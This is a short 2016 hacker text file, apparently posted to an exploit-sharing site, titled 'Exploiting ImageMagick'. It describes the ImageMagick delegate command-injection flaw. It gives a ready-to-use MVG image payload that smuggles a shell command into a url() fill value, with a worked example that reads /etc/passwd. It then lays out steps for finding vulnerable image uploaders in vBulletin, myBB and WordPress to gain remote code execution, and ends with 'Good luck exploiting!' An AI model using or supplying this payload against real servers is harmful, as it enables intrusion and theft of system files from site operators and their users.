[+]======================================================================[+]
[|]		          Exploiting ImageMagick		         [|]
[|]			      By @CrazedSec			         [|]
[+]======================================================================[+]
[|]                            What is it?                               [|]
[+]======================================================================[+]
[|]							                 [|]
[|] ImageMagick is a popular software used to convert, edit              [|]
[|] and manipulate images. It has libraries for all common               [|]
[|] programming languages, including PHP, Python, Ruby and               [|]
[|] many others. It is also very simple to use, which lead it            [|]
[|] to be used by many developers when in need of image                  [|]
[|] cropping or manipulation.                                            [|]
[|]						                         [|]
[+]======================================================================[+]
[|]                            Vulnerability                             [|]
[+]======================================================================[+]
[|]						                         [|]
[|] ImageMagick doesn’t properly filter the file names that              [|]
[|] get passed to the internal delegates that handle external            [|]
[|] protocols (ex. HTTPS)This allows an attacker to execute              [|]
[|] commands remotely by uploading an image. This leads to a             [|]
[|] full RCE vulnerability in your image uploader.                       [|]
[|]						                         [|]
[+]======================================================================[+]
[|]                           Exploit Code                               [|]
[+]======================================================================[+]
[|] Should work for all image files (.jpg/.mvg/.svg/.png/etc.)           [|]
[+] Exploit Image contents:                                              [|]
[|]     								 [|]
[|] push graphic-context 						 [|]
[|] viewbox 0 0 640 480 						 [|]
[|] fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'       [|]
[|]									 [|]
[+] Example Image:							 [|]
[|]									 [|]
[|] push graphic-context 						 [|]
[|] viewbox 0 0 640 480 						 [|]
[|] fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' 	 [|]
[|] pop graphic-context							 [|]
[|]									 [|]
[|] More examples: https://ghostbin.com/paste/vd3u5			 [|]
[+]======================================================================[+]
[|]                         How to Exploit                               [|]                                          
[+]======================================================================[+] 
[|]						                         [|]
[|]  1. Find an Image uploader that uses ImageMagick to process images.  [|]
[|]  (Try it @ http://attack32.samsclass.info/im.htm)                    [|]
[|]  2. Craft a malicious image file					 [|]
[|]  3. If it is running a vulnerable version, you'll have full RCE!     [|]
[|]						                         [|]
[|]  Sometimes popular CMS' such as vBulletin, myBB, and WordPress	 [|]
[|]  implement ImageMagick to process user images! 			 [|]
[|]						                         [|]
[|]                       Good luck exploiting! 	                 [|]
[|]			      [email protected]		                 [|]
[+]======================================================================[+]


# siph0n [2016-05-13]